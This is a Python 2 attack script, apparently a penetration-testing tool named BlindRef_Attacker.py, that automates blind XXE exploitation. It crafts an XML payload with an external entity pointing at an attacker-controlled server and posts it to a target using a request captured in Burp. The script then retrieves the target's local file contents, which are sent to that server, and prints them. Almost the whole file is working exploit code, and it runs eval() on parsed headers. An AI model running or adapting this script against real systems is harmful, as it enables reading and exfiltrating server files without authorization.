BlindRef_Attacker.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests, re, sys, getopt, json, urllib2, copy

serverURL = ""
serverPort = ""
webRequest = ""

def getInfo():
    # Determine number of payloads on our server
    resp = requests.get(str(serverURL) + ":" + str(serverPort) + "/getInfo")
    numPayloads = resp.content
    for i in range(0,int(numPayloads)):
        # Issue requests to generate requests to our controlled server
        submitRequest()

    # Obtain details from our server application
    getFinalDetails()

def submitRequest():
    global webRequest

    # Used to instantiate the attack
    # Induces an HTTP request from the application's webserver to our controlled server
    # Our server then 'serves' XML Entities. When these external entities are processed by the web application
    # The local system files contents are queried and included within a subsequent request.
    # This request template can be generated by using the "Copy as requests" Burp Extension

    # Crafting XXE Payload
    BLINDREF = '<?xml version=\"1.0\" ?>\r\n<!DOCTYPE xxeElement [\r\n<!ELEMENT xxeElement ANY >\r\n<!ENTITY % xxeEntity SYSTEM \"'
    BLINDREF += serverURL + ":" + str(serverPort) + '/ev.xml\">'
    BLINDREF += '\r\n%xxeEntity;\r\n%content;\r\n]>\r\n<xxeElement>&xxeEntity;</xxeElement>'

    # Parse URL data from 'Copy as Requests' module - BurpSuite
    url1 = webRequest.split('"')[1]
    finalURL = url1.split('"')[0]
    burpRequest = webRequest.split("import requests")[1]

    # Parse header information from 'Copy as Requests' module - BurpSuite
    sec = burpRequest.split("headers=")[1]
    finalHeaders = sec.split(", data")[0]

    # POST payload
    requests.post(finalURL, data=BLINDREF, headers=eval(finalHeaders))

def help():
    # Prints out the help function, which guides users how to use the script.
    print 'BlindRef_Attacker.py -s serverURL -p serverPort -r webRequest'

def getFinalDetails():
    resp = requests.get(str(serverURL) + ":" + str(serverPort) + "/getFinalDetails")
    results = resp.content

    # Does some cleaning up for odd characters
    x = results.replace("%0A","\n")
    x = x.replace("/?","")
    print x
    reset()

def reset():
    # Instructs server to reset data
    requests.get(str(serverURL) + ":" + str(serverPort) + "/reset")

def main(argv):
    global serverURL, serverPort, webRequest
    webRequestLocation = ""

    try:
        opts, args = getopt.getopt(argv,"hs:p:r:",["server=","port=","webrequest="])
    except getopt.GetoptError:
        help()
        sys.exit()
    if len(opts)==3:
        for opt, arg in opts:
            if opt == '-h':
                help()
                sys.exit()
            elif opt in ("-s", "--server"):
                serverURL = arg
            elif opt in ("-p", "--port"):
                serverPort = arg
            elif opt in ("-r", "--webrequest"):
                webRequestLocation = arg

        try:
            with open(webRequestLocation, 'r') as content_file:
                webRequest = content_file.read()
        except Exception as e:
            print "Unable to parse file."
            exit()

        getInfo()

    else:
        help()
        exit()

if __name__ == "__main__":
    main(sys.argv[1:])